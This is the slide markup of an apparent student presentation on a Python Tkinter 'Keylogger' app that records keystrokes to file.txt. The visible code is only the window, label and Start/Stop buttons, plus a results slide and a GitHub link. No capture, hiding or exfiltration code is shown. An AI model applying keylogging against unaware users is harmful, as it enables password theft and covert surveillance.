              </a:rPr>
              <a:t> start_button.config(state='normal')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> stop_button.config(state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>root = Tk()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>root.title("Keylogger")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>label.pack(pady=20)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>start_button.pack(side=LEFT, padx=10, pady=10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>stop_button.pack(side=RIGHT, padx=10, pady=10)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>root.geometry("300x150")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="1613"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1152">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t>root.mainloop()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="161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2700000">
            <a:off x="4142033" y="1878179"/>
            <a:ext cx="4658241" cy="4003176"/>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700000">
            <a:off x="-1691784" y="3435906"/>
            <a:ext cx="11023498" cy="6103235"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1261612" cy="698500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 6" id="6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1261612" cy="698500"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="698500" w="1261612">
                  <a:moveTo>
                    <a:pt x="1261612" y="349250"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1058412" y="698500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="698500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="349250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1058412" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1261612" y="349250"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect l="0" t="-4185" r="0" b="-4185"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 7" id="7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11261107" y="2816813"/>
            <a:ext cx="3810173" cy="4125227"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4125227" w="3810173">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3810173" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3810173" y="4125227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4125227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="-4166" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 8" id="8"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10176918" y="1555170"/>
            <a:ext cx="5566129" cy="9410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OUTPUT FOR THE CODE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="10176918" y="7323455"/>
            <a:ext cx="7762771" cy="1934845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans"/>
              </a:rPr>
              <a:t>The  entered text can be saved in file ,.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans"/>
              </a:rPr>
              <a:t>Every key stroke driven by keyboard are noted in text file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2199">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Comic Sans"/>
              </a:rPr>
              <a:t>So that the file contains the text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="3079"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="30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194B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0301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110636"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7000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1039108" y="5258956"/>
            <a:ext cx="2813835" cy="3988936"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="955595" cy="1354667"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="955595" cy="1354667"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1354667" w="955595">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="955595" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955595" y="1354667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1354667"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="true">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="2CEEFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0039A6">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000"/>
            </a:gradFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 5" id="5"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="955595" cy="1383242"/>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836895" y="1028700"/>
            <a:ext cx="4032095" cy="7421405"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="513496" cy="945133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="513496" cy="945133"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="945133" w="513496">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="513496" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513496" y="945133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="945133"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect l="-54302" t="0" r="-121957" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 8" id="8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="6078540" y="0"/>
            <a:ext cx="4032095" cy="7421405"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="513496" cy="945133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 9" id="9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="513496" cy="945133"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="945133" w="513496">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="513496" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513496" y="945133"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="945133"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect l="-151578" t="0" r="-133883" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 10" id="10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11317700" y="2672959"/>
            <a:ext cx="4834948" cy="4941081"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="4941081" w="4834948">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4834948" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4834948" y="4941082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4941082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 11" id="11"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11317700" y="1206633"/>
            <a:ext cx="5396153" cy="1152270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="9083"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7633">
                <a:solidFill>
                  <a:srgbClr val="29E2F9"/>
                </a:solidFill>
                <a:latin typeface="Anton"/>
              </a:rPr>
              <a:t>RESULTS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11317700" y="8225250"/>
            <a:ext cx="4845963" cy="297180"/>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Bold"/>
              </a:rPr>
              <a:t>The entered key strokes are saved in file.txt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194B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0301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70741"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7000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 3" id="3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="6955134"/>
            <a:ext cx="17259300" cy="3331866"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4545659" cy="877529"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 4" id="4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="4545659" cy="877529"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="877529" w="4545659">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4545659" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4545659" y="877529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="877529"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill rotWithShape="true">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="2CEEFF">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="0039A6">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000"/>
            </a:gradFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 5" id="5"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-38100"/>
              <a:ext cx="4545659" cy="91562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413084" y="2273317"/>
            <a:ext cx="9145640" cy="6984983"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="6984983" w="9145640">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9145640" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9145640" y="6984983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6984983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 7" id="7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8632569" y="2537888"/>
            <a:ext cx="8706670" cy="4624806"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11608893" cy="6166408"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 8" id="8"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="346" t="0" r="346" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11608893" cy="6166408"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 9" id="9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10205634" y="3877966"/>
            <a:ext cx="2617437" cy="2656070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2656070" w="2617437">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2617437" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2617437" y="2656070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2656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1134916" y="4551101"/>
            <a:ext cx="758874" cy="1028031"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1028031" w="758874">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="758873" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="758873" y="1028031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10280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50869" y="1701945"/>
            <a:ext cx="5396153" cy="1152270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="9083"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7633">
                <a:solidFill>
                  <a:srgbClr val="29E2F9"/>
                </a:solidFill>
                <a:latin typeface="Anton"/>
              </a:rPr>
              <a:t>LINKS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 12" id="12"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="357945" y="3820816"/>
            <a:ext cx="8055139" cy="464237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3812"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2722">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Canva Sans"/>
              </a:rPr>
              <a:t> https://github.com/Swamy1226/apssdc.git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194B">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="0301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89909" y="-8759112"/>
            <a:ext cx="20212439" cy="20212439"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="20212439" w="20212439">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20212438" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20212438" y="20212439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20212439"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="17000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 3" id="3"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="5747212" y="4185474"/>
            <a:ext cx="6793577" cy="1925577"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="15129"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12713">
                <a:solidFill>
                  <a:srgbClr val="29E2F9"/>
                </a:solidFill>
                <a:latin typeface="Anto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354486" y="2091882"/>
            <a:ext cx="7101947" cy="6103235"/>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19852" t="0" r="-9134" b="0"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 4" id="4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13653565" y="3594161"/>
            <a:ext cx="3605735" cy="3098679"/>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6" id="6"/>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3904416" y="3809736"/>
            <a:ext cx="3104032" cy="2667527"/>
            <a:chOff x="0" y="0"/>
